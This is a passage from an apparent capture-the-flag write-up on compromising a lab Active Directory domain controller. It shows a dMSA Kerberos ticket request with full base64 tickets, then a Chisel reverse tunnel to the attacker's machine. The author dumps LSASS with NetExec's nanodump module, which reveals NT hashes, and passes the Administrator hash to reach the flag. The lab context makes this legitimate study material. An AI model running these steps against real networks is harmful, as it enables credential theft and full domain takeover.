/ticket:doIFxDCCBcCgAwIBBaEDAgEWooIExDCCBMBhggS8MIIEuKADAgEFoQ4bDEVJR0hURUVOLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMZWlnaHRlZW4uaHRio4IEfDCCBHigAwIBEqEDAgECooIEagSCBGYSU2FA0d0S1eHGm4MrFC1rPQGpwA8OU73WTLorvUv8bi4Yn3+8s5v2Gnz0M08Sc/w92OtcrE8r52M+vRKtpGMwq7MfKWECuXPNelCdFanPCf0kORjx8EGzBJFzCD1vkyOhb3bTKQKUkEM4Lrx3fnkm+fxQkj/L2nDAVn8bYukYThM9O0FrxQOjoL+HZjzu8zhFB+MBY/qvycKyUXolPv94Er/Q8B98KhxZZuqo/KOqkmrx8qtD1uNuXvLx41lAdGFhW1+q9v1uahPBnvdDvZUZXu8UeQnINo5TUiEzr+d+NbFSAVqr/K+ChfaFbErzz0xOi/b0I9b9TRR4h0qp5o7SSGeZ8Vi5tpZVDltPJAM6v7HPFYyeiezZx7/0nb+kWn7Tn+OFcAqNh5O7OqbjsfMXTA1LEEEJ39/UVXuUjK9BkcPhfmbiQ5h/Lsb6nIuE5jDbRY0CExxiN8WJDy1qBgremgGrDfZknHsG6KW/V6nf+Y/eH7RMEUuRrbjdgTUIljAi1UhdcHk4PohtywfFII3wsCIvdckmqKudp6N2LJoQ0AZ8BqASw6N7flLz0BkusYv6VEift59vIh/pJIs/38/JJ5WHnxIWIUyQofQPI5CVDfvnwG++h55wo1Mxt1lLgg5eeyCB0d1UiTm/DXcCWmYY7bBAObXKuIkIA43hNasWfckIV3oEddEszTDxMGQXx3EsnhdgRN/EzPWtPi6H+C9XUZtFEwn37JTemXF8Th9zbSI9Cn6z0+rGiHDfY1n0CZTiLufCJvaBoumgYD5heIL7htwHZ97SC/nEF8pQjCGKgroy8FXq8dzhiCch1CfO8IdgZ5LXia/H4Ewt2W+qxE7Y05H16vB8fUAzx0S/4LLOxS0V600EWX14PgxWn46/D4g8RbdXhBL5fqaEJ6SnrOdagXPkC0JW5kKMSwtixcOE8dQPuIF3u5vvQpPLK2Dv4a6p3fLEcQE+klDqwA+QHEyDknccH7NfMiF1BtYXlmTkFC/HMmorT9hm97A1SwswXZkmSKrZ7Kect375lHIC3y1AfhkOdTSSc3LEegjNiT53O4Ysn5cida3LxvTZVGiPkYualMfAFns63q8V9ipXmSKsO443VTpn/byD7kV7gOCaC3kF3yHcmoBpjrBmzpCnKfmtxF/1cdLDl4XFqGTkCjNXR+iAjyLQYQVORX85OGkTbQsPyxKIPmbEU+4B2XIt8H8OD2CRpVltPMlI0ENrXWuSN+99rPb13YemMs1GK6s0DmaB/imHo8e3wqtsrsWjaIoXqkcqvKvgcB7pgmIa4aqtVJwo+WRFRbRtq6E7/WL19XRGznmXYv1Ph+56xBGcFXPWFA8y+M0x93W2YLDzRMOb1MHml6nbh+fOa4u6MmPYlT17zimsh5junG/XM6wbUlqwJCvd5+gYQyz20dGDsFB5oXdbEvxrTHxw2hcg1Xa8TboA1lIrCJ89LH4EiBvWpxS+ITNnQRZQySBC/zR1hHkR+y5B4p/1o4HrMIHooAMCAQCigeAEgd19gdowgdeggdQwgdEwgc6gKzApoAMCARKhIgQghros42827gVLxCoJZ9odJ++GbTreZe0PrAc1vywmY3uhDhsMRUlHSFRFRU4uSFRCohowGKADAgEBoREwDxsNUHduZWRNQWNoaW5lJKMHAwUAQOEAAKURGA8yMDI2MDEyOTE4NDQ0OVqmERgPMjAyNjAxMzAwNDQ0NDlapxEYDzIwMjYwMjA1MTg0NDQ5WqgOGwxFSUdIVEVFTi5IVEKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDGVpZ2h0ZWVuLmh0Yg==
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Ask TGS
[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building DMSA TGS-REQ request for 'Pwned_DMSA$' from 'PwnedMachine$'
[+] Sequence number is: 633938499
[*] Using domain controller: DC01.eighteen.htb (fe80::9d77:3dfa:f581:2714%3)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):
doIF0DCCBcygAwIBBaEDAgEWooIE0jCCBM5hggTKMIIExqADAgEFoQ4bDEVJR0hURUVOLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMRUlHSFRFRU4uSFRCo4IEijCCBIagAwIBEqEDAgECooIEeASCBHTZPrt9LUtAGWfzF6oFBQkFwogcBE3tWatF1bn+MSVLlrX0E1Lur2Uphh6KIld3VIpJeRjKAzbk3o8KAderftTgklqnD3FrwzxhUmYO0Z6AVh4QWhVDD03LEEvegvY9LtHJQHyvbSk48g9xVEAhPpQFkF3YpH7kKr6M8vU2rtSnwfneKSKFIGwupXiMUsE69/Xm9DrR0dZIQoa28AAtpJpwEzkHR1EUEGPcL2zbmQA5iRSeNxBHup91IeC4af7st9erLiZO5NxnqJFtjC4ClaOe4lXNHXJa+PaJSc9w0HhmuxiwMbgJuhcuIJhkc0jUZpeNECOFzoUrrRfDCBP8lFuvr/sCl3/5rmUK9r7qdCAO50OkZKYhGuRRvnG/dvl/vPxzJ8H0/vuaY0qiqP1/SLvGzIEgSyv0ELu0epYXRIyWEu7LwR+qlEef29lNXSSqTFxqlEMcFJJNyPUQ7/hnooIX63joVpVjyIZs7Ra3hU/np5fdgfQ52COmLY+ymx/WQLyLskPBVKJl6nPNIv4UeBMS/J3HHGxc6X4aw30w6vIHQcZBNM6rheNjWX2FJxw6BbFj4dTC1YW9bb+eii93vCqIec0DIesJhlM9kt+i89c9EQfj+nunlnf22Gjpz5Pfffoo+j5rwNrWcbcSlf1mzlG5VC58JiPoZDmiT22CP63Ge1O5WYuh10/7Oij6FkGhzaybhnuC445raH+NC9MfsnWlIJSeMryPPLobZP62JhlrsCA9a8LU+DEPJ9a2UoT7vMLkCJBD6Xv1+E+STwqg+WVddz+d8lW9B1tI0lDVZqWO0F8VTJw8PZgvYeIuk4yj+Do7f60834cPV853ZpORtPRqo5roXgUpLlbgUqcSVdxkh7ifSGTWQFmQh+BZboWwZI7YBomcjxw1T5Oysh5Ibtu1xxHoVjxoNHxKq+Z4zkAuSvLWoB6YAgJ/isURt3Ev5a0B2J9/zTD6HveE8UhdISE9PqRFX4LBuNLoyVHE1NCbi2C6jvGprRTqWQUCfMZ3SM03VoM51Zq/LXoWxo4k3x1Sw38UOzELZdcCb3ppQmphIcDu+9uXDwOFKT6ylbJ1Kev1oA9qiP6afK3syzZlTDxziews3QWCRQ8mTUOiEmqr6NdVbFNMJ7yH1j2tWs3SZ1XqGG1Zy6U5ApGZTb3tkxrohnYeYrcMFrtoV+1Y0TOsNlECUQhV+b+Oo1OoTgoP29baKInNMvFoH1s2lPEOCxdGbYw/dWUB9gx4/dbnW1Ki9AbkklFs/IUicjtrnjWayTi/ToR7597sM1cMSQj9tpTKd0k2o+w54VFnRBBsaJemnt1ENMBoumjhzlhBBOhOTxvGJSbPbZpURm6ErpAIDRzezjyC0fYy8FTq5culxWnfACNeYeEYgrbGvShywjeUjsD/htk1OW4F6yvIN7RQ0h7zv7cYmFnvn1MjEPHbvYXl5EHgbspEgn93m5/gin6UFK/yS1kLmyixIc/p7sSpnp0zEGub64UjrVPPS/Tf8Vu/N876C4mjgekwgeagAwIBAKKB3gSB232B2DCB1aCB0jCBzzCBzKArMCmgAwIBEqEiBCDdVrBof0xwAo64Bq67bPYA47+1jXwpXFZb9/PqXSwu86EOGwxlaWdodGVlbi5odGKiGDAWoAMCAQGhDzANGwtQd25lZF9ETVNBJKMHAwUAQKEAAKURGA8yMDI2MDEyOTE4NDY1N1qmERgPMjAyNjAxMjkxOTAxNTdapxEYDzIwMjYwMjA1MTg0NDQ5WqgOGwxFSUdIVEVFTi5IVEKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDEVJR0hURUVOLkhUQg==
ServiceName : krbtgt/EIGHTEEN.HTB
ServiceRealm : EIGHTEEN.HTB
UserName : Pwned_DMSA$ (NT_PRINCIPAL)
UserRealm : eighteen.htb
StartTime : 1/29/2026 10:46:57 AM
EndTime : 1/29/2026 11:01:57 AM
RenewTill : 2/5/2026 10:44:49 AM
Flags : name_canonicalize, pre_authent, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : 3VawaH9McAKOuAauu2z2AOO/tY18KVxWW/fz6l0sLvM=
Current Keys for Pwned_DMSA$: (aes256_cts_hmac_sha1) 390D3BAD0C0F5C72154FD8B13A66E45AE7DF0AE8A5481BA1818B3212D9FE8ABC
Since the DC doesn’t expose any other open ports, we can use a Chisel tunnel and port forward some useful ports such as Kerberos, WinRM, SMB, LDAP, NetBIOS, and WMI. First, start a Chisel server on your attacking machine:
mairon $ sudo chisel server --reverse --port 9002
2026/01/29 16:38:15 server: Reverse tunnelling enabled
2026/01/29 16:38:15 server: Fingerprint 6IcpxS5ZxGmasnkSuawTFYGOESDGmfKLCl/bMTgjGWk=
2026/01/29 16:38:15 server: Listening on http://0.0.0.0:9002
Then upload chisel.exe, connect to the server, and port forward these useful ports:
evil-winrm-py PS C:\Users\adam.scott\Documents> upload ~/htb/chisel.exe .
Uploading /home/mairon/htb/chisel.exe: 10.1MB [00:11, 905kB/s]
[+] File uploaded successfully as: C:\Users\adam.scott\Documents\chisel.exe
evil-winrm-py PS C:\Users\adam.scott\Documents> .\chisel.exe client 10.10.14.74:9002 R:88:localhost:88 R:5985:localhost:5985 R:445:localhost:445 R:389:localhost:389 R:137/udp:localhost:137/udp R:139:localhost:139 R:138/udp:localhost:138/udp R:137:localhost:137 R:135:localhost:135
Now we can use our TGS from our attacking system directly. First we need to convert it from kirbi to ccache:
mairon $ echo 'doIF0DCCBcygAwIBBaEDAgEWooIE0jCCBM5hggTKMIIExqADAgEFoQ4bDEVJR0hURUVOLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMRUlHSFRFRU4uSFRCo4IEijCCBIagAwIBEqEDAgECooIEeASCBHTZPrt9LUtAGWfzF6oFBQkFwogcBE3tWatF1bn+MSVLlrX0E1Lur2Uphh6KIld3VIpJeRjKAzbk3o8KAderftTgklqnD3FrwzxhUmYO0Z6AVh4QWhVDD03LEEvegvY9LtHJQHyvbSk48g9xVEAhPpQFkF3YpH7kKr6M8vU2rtSnwfneKSKFIGwupXiMUsE69/Xm9DrR0dZIQoa28AAtpJpwEzkHR1EUEGPcL2zbmQA5iRSeNxBHup91IeC4af7st9erLiZO5NxnqJFtjC4ClaOe4lXNHXJa+PaJSc9w0HhmuxiwMbgJuhcuIJhkc0jUZpeNECOFzoUrrRfDCBP8lFuvr/sCl3/5rmUK9r7qdCAO50OkZKYhGuRRvnG/dvl/vPxzJ8H0/vuaY0qiqP1/SLvGzIEgSyv0ELu0epYXRIyWEu7LwR+qlEef29lNXSSqTFxqlEMcFJJNyPUQ7/hnooIX63joVpVjyIZs7Ra3hU/np5fdgfQ52COmLY+ymx/WQLyLskPBVKJl6nPNIv4UeBMS/J3HHGxc6X4aw30w6vIHQcZBNM6rheNjWX2FJxw6BbFj4dTC1YW9bb+eii93vCqIec0DIesJhlM9kt+i89c9EQfj+nunlnf22Gjpz5Pfffoo+j5rwNrWcbcSlf1mzlG5VC58JiPoZDmiT22CP63Ge1O5WYuh10/7Oij6FkGhzaybhnuC445raH+NC9MfsnWlIJSeMryPPLobZP62JhlrsCA9a8LU+DEPJ9a2UoT7vMLkCJBD6Xv1+E+STwqg+WVddz+d8lW9B1tI0lDVZqWO0F8VTJw8PZgvYeIuk4yj+Do7f60834cPV853ZpORtPRqo5roXgUpLlbgUqcSVdxkh7ifSGTWQFmQh+BZboWwZI7YBomcjxw1T5Oysh5Ibtu1xxHoVjxoNHxKq+Z4zkAuSvLWoB6YAgJ/isURt3Ev5a0B2J9/zTD6HveE8UhdISE9PqRFX4LBuNLoyVHE1NCbi2C6jvGprRTqWQUCfMZ3SM03VoM51Zq/LXoWxo4k3x1Sw38UOzELZdcCb3ppQmphIcDu+9uXDwOFKT6ylbJ1Kev1oA9qiP6afK3syzZlTDxziews3QWCRQ8mTUOiEmqr6NdVbFNMJ7yH1j2tWs3SZ1XqGG1Zy6U5ApGZTb3tkxrohnYeYrcMFrtoV+1Y0TOsNlECUQhV+b+Oo1OoTgoP29baKInNMvFoH1s2lPEOCxdGbYw/dWUB9gx4/dbnW1Ki9AbkklFs/IUicjtrnjWayTi/ToR7597sM1cMSQj9tpTKd0k2o+w54VFnRBBsaJemnt1ENMBoumjhzlhBBOhOTxvGJSbPbZpURm6ErpAIDRzezjyC0fYy8FTq5culxWnfACNeYeEYgrbGvShywjeUjsD/htk1OW4F6yvIN7RQ0h7zv7cYmFnvn1MjEPHbvYXl5EHgbspEgn93m5/gin6UFK/yS1kLmyixIc/p7sSpnp0zEGub64UjrVPPS/Tf8Vu/N876C4mjgekwgeagAwIBAKKB3gSB232B2DCB1aCB0jCBzzCBzKArMCmgAwIBEqEiBCDdVrBof0xwAo64Bq67bPYA47+1jXwpXFZb9/PqXSwu86EOGwxlaWdodGVlbi5odGKiGDAWoAMCAQGhDzANGwtQd25lZF9ETVNBJKMHAwUAQKEAAKURGA8yMDI2MDEyOTE4NDY1N1qmERgPMjAyNjAxMjkxOTAxNTdapxEYDzIwMjYwMjA1MTg0NDQ5WqgOGwxFSUdIVEVFTi5IVEKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDEVJR0hURUVOLkhUQg==' > ticket.kirbi.b64
mairon $ base64 -d ticket.kirbi.b64 > ticket.kirbi
mairon $ ticketConverter.py ticket.kirbi ticket.ccache
mairon $ export KRB5CCNAME=ticket.ccache
Chances are this ticket has since been expired, as it’s only valid for 15 minutes.
Also, the DC seems to remove our dMSA periodically, so you might need to recreate and reconfigure that dMSA.
And to make our lives more miserable, there seems to be a clock skew of 7 hours, which causes KRB_AP_ERR_SKEW(Clock skew too great) errors.
Pretty annoying…
The clock skew can be solved with prepending faketime -f '+7h' to your commands.
Geez, I tried so many things from here: secretsdump.py didn’t work dumping NTDS.dit, not via DRSUAPI, nor VSS.
Neither could I login using the ticket via wmiexec.py, nor smbclient.py (there aren’t any administrative shares available), nor evil-winrm.
NetExec also failed me plenty of times trying to login via WMI, WinRM, SMB, dumping NTDS.dit.
Dumping SAM worked, though, but I did not manage to login via the retrieved Administrator hash. Dumping LSA also worked, which got me the AES key and NT hash of the DC01$ computer account. Getting a TGT using the AES key worked, but that also did not allow me to login via the aforementioned protocols.
I was loosing it. The only thing that eventually worked, after way too many hours lost, was using the nanodump module:
mairon $ faketime -f '+7h' nxc smb --use-kcache --kdcHost 127.0.0.1 127.0.0.1 -M nanodump
SMB 127.0.0.1 445 DC01 [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:eighteen.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 127.0.0.1 445 DC01 [+] eighteen.htb\Pwned_DMSA$ from ccache (Pwn3d!)
NANODUMP 127.0.0.1 445 DC01 [*] 64-bit Windows detected.
NANODUMP 127.0.0.1 445 DC01 [+] Created file nano.exe on the \\C$\Windows\Temp\
NANODUMP 127.0.0.1 445 DC01 [*] Getting LSASS PID via command tasklist /v /fo csv | findstr /i "lsass"
SMB 127.0.0.1 445 DC01 [-] WMIEXEC: Dcom initialization failed on connection with stringbinding: "ncacn_ip_tcp:DC01.eighteen.htb[63482]", please increase the timeout with the option "--dcom-timeout". If it's still failing maybe something is blocking the RPC connection, try another exec method
NANODUMP 127.0.0.1 445 DC01 [*] Executing command C:\Windows\Temp\nano.exe --pid 820 --write C:\Windows\Temp\20260129_2339.log
SMB 127.0.0.1 445 DC01 [-] WMIEXEC: Dcom initialization failed on connection with stringbinding: "ncacn_ip_tcp:DC01.eighteen.htb[63482]", please increase the timeout with the option "--dcom-timeout". If it's still failing maybe something is blocking the RPC connection, try another exec method
NANODUMP 127.0.0.1 445 DC01 [+] Process lsass.exe was successfully dumped
NANODUMP 127.0.0.1 445 DC01 [*] Copying 20260129_2339.log to host
NANODUMP 127.0.0.1 445 DC01 [+] Dumpfile of lsass.exe was transferred to /tmp/DC01_64_eighteen.htb.log
NANODUMP 127.0.0.1 445 DC01 [+] Deleted nano file on the C$ share
NANODUMP 127.0.0.1 445 DC01 [+] Deleted lsass.dmp file on the C$ share
NANODUMP 127.0.0.1 445 DC01 EIGHTEEN\Administrator:0b133be956bfaddf9cea56701affddec
NANODUMP 127.0.0.1 445 DC01 EIGHTEEN\mssqlsvc:c44d16951b0810e8f3bbade300966ec4
That gave me a usable NT hash I could replay:
mairon $ ewp -i localhost -u Administrator -H 0b133be956bfaddf9cea56701affddec
_ _ _
_____ _(_| |_____ __ _(_)_ _ _ _ _ __ ___ _ __ _ _
/ -_\ V | | |___\ V V | | ' \| '_| ' |___| '_ | || |
\___|\_/|_|_| \_/\_/|_|_||_|_| |_|_|_| | .__/\_, |
|_| |__/ v1.5.0
[*] Connecting to 'localhost:5985' as 'Administrator'
evil-winrm-py PS C:\Users\Administrator\Documents> cat ..\Desktop\root.txt
af45f4c3b64a772f01e39b0138a1db98
Finally…